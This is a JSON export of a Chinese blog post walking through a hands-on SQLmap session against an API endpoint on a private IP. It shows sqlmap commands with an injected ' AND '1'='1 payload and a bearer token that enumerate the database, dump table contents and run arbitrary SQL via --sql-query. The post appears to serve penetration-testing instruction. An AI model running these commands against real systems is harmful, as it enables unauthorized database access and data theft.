{"id":1208,"date":"2022-09-08T10:31:28","date_gmt":"2022-09-08T02:31:28","guid":{"rendered":"https:\/\/www.yinyubo.com\/?p=1208"},"modified":"2022-09-08T10:32:40","modified_gmt":"2022-09-08T02:32:40","slug":"sqlmap%e7%9a%84%e4%b8%80%e6%ac%a1%e5%ae%9e%e6%88%98","status":"publish","type":"post","link":"https:\/\/www.yinyubo.com\/?p=1208","title":{"rendered":"SQLmap\u7684\u4e00\u6b21\u5b9e\u6218"},"content":{"rendered":"\n

1.\u627e\u6ce8\u5165\u70b9\uff08\u65b9\u6cd5\u53ef\u4ee5\u901a\u8fc7owasp zap\u53bb\u626b\u63cf\uff0c\u53c2\u8003https:\/\/www.yinyubo.com\/?p=79<\/a>\uff09<\/p>\n\n\n\n

\n\n\n\n

2.\u627e\u5230\u6ce8\u5165\u70b9\u540e\uff0c\u5c06url\u8bb0\u4e0b\u6765\uff0c\u4f8b\u5982\u4e0b\u56fe<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n
\n\n\n\n

3.\u5728linux\u7cfb\u7edf\u91cc\u4e0b\u8f7dsqlmap\u5de5\u5177\u548cpython<\/p>\n\n\n\n

git clone --depth 1 https:\/\/github.com\/sqlmapproject\/sqlmap.git sqlmap-dev\napt install python -y<\/code><\/pre>\n\n\n\n
\n\n\n\n
4.\u53bb\u88ab\u6d4b\u7f51\u7ad9\u4e0a\u83b7\u53d6\u767b\u5f55\u7528\u7684token\u3002\u8fd9\u91cc\u7684Authorization\u4fe1\u606f\u7528\u5728sqlmap\u7684head\u53c2\u6570\u91cc<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n\n\n\n
5.\u4f7f\u7528sqlmap\u5de5\u5177\u83b7\u5f97\u5f53\u524d\u6570\u636e\u5e93\u7684schema <\/p>\n\n\n\n
python sqlmap.py -u 'http:\/\/192.168.0.12:30812\/api\/v1\/abcd?begin_at=2022-01-01+00%3A00%3A00&end_at=2022-09-07+00%3A00%3A00%27+AND+%271%27%3D%271\r\n' --method GET  -H 'Authorization:Bearer NDJJMWJKZGITZMFHMY0ZNGY3LTG1OTQTZTRLYMVHZME1M2E4' --level 3  --current-db --answers=\"Y\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6839\u636e\u4e0a\u56fe\u8fd4\u56de\u7684\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u5f97\u5230\u6570\u636e\u5e93\u7684schema\u662fpublic<\/p>\n\n\n\n
\n\n\n\n
6.\u83b7\u53d6\u5230\u4e86\u6570\u636e\u5e93\u540d\u5b57\u4e4b\u540e\uff0c\u6211\u4eec\u518d\u53bb\u83b7\u53d6\u6570\u636e\u5e93\u7684\u8868<\/p>\n\n\n\n
python sqlmap.py -u 'http:\/\/192.168.0.12:30812\/api\/v1\/abcd?begin_at=2022-01-01+00%3A00%3A00&end_at=2022-09-07+00%3A00%3A00%27+AND+%271%27%3D%271\r\n' --method GET  -H 'Authorization:Bearer NDJJMWJKZGITZMFHMY0ZNGY3LTG1OTQTZTRLYMVHZME1M2E4' --level 3  -D public --tables --answers=\"Y\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n\n\n\n
7.\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5df2\u7ecf\u83b7\u53d6\u5230\u4e86\u6570\u636e\u5e93\u7684\u6240\u6709\u7684\u8868\u4e86\uff0c\u6211\u4eec\u4efb\u610f\u9009\u4e00\u5f20\u8868\uff0c\u53bb\u83b7\u53d6\u5b57\u6bb5<\/p>\n\n\n\n
python sqlmap.py -u 'http:\/\/192.168.0.12:30812\/api\/v1\/abcd?begin_at=2022-01-01+00%3A00%3A00&end_at=2022-09-07+00%3A00%3A00%27+AND+%271%27%3D%271\n' --method GET  -H 'Authorization:Bearer NDJJMWJKZGITZMFHMY0ZNGY3LTG1OTQTZTRLYMVHZME1M2E4' --level 3  -D public -T migrations --dump --answers=\"Y\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n\n\n\n
8.\u6293\u5230\u5217\u540d\u4e4b\u540e\uff0c\u6211\u4eec\u6839\u636e\u5217\u540d\uff0c\u518d\u53bb\u83b7\u53d6\u6570\u636e\uff0c\u6bd4\u5982\u6211\u83b7\u53d6dirty \u548cversion\u5b57\u6bb5\u7684\u6570\u636e<\/p>\n\n\n\n
python sqlmap.py -u 'http:\/\/192.168.0.12:30812\/api\/v1\/abcd?begin_at=2022-01-01+00%3A00%3A00&end_at=2022-09-07+00%3A00%3A00%27+AND+%271%27%3D%271\r\n' --method GET  -H 'Authorization:Bearer NDJJMWJKZGITZMFHMY0ZNGY3LTG1OTQTZTRLYMVHZME1M2E4' --level 3  -D public -T schema_migrations -C version,id --dump --answers=\"Y\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n\n\n\n
9.\u5230\u8fd9\u91cc\u57fa\u672c\u4e0a\u5c31\u7ed3\u675f\u4e86\uff0c\u5982\u679c\u8fd8\u60f3\u5f80\u91cc\u9762\u6267\u884cSQL\u811a\u672c\u7684\u8bdd\uff08\u589e\u5220\u6539\uff09\uff0c\u53ef\u4ee5\u4f7f\u7528–sql-query\u8bed\u53e5\uff0c\u6211\u8fd9\u4e2a\u662f\u67e5\u8be2\u65f6\u95f4<\/p>\n\n\n\n
python sqlmap.py -u 'http:\/\/192.168.0.12:30812\/api\/v1\/abcd?begin_at=2022-01-01+00%3A00%3A00&end_at=2022-09-07+00%3A00%3A00%27+AND+%271%27%3D%271\r\n' --method GET  -H 'Authorization:Bearer NDJJMWJKZGITZMFHMY0ZNGY3LTG1OTQTZTRLYMVHZME1M2E4' --sql-query=\"select now();\" --answers=\"Y\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n","protected":false},"excerpt":{"rendered":"
1.\u627e\u6ce8\u5165\u70b9\uff08\u65b9\u6cd5\u53ef\u4ee5\u901a\u8fc7owasp zap\u53bb\u626b\u63cf\uff0c\u53c2\u8003https:\/\/www.yinyubo.com\/?p= […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,10],"tags":[],"class_list":["post-1208","post","type-post","status-publish","format-standard","hentry","category-influxdb","category-10"],"_links":{"self":[{"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=\/wp\/v2\/posts\/1208","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1208"}],"version-history":[{"count":2,"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=\/wp\/v2\/posts\/1208\/revisions"}],"predecessor-version":[{"id":1219,"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=\/wp\/v2\/posts\/1208\/revisions\/1219"}],"wp:attachment":[{"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1208"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1208"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.yinyubo.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1208"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}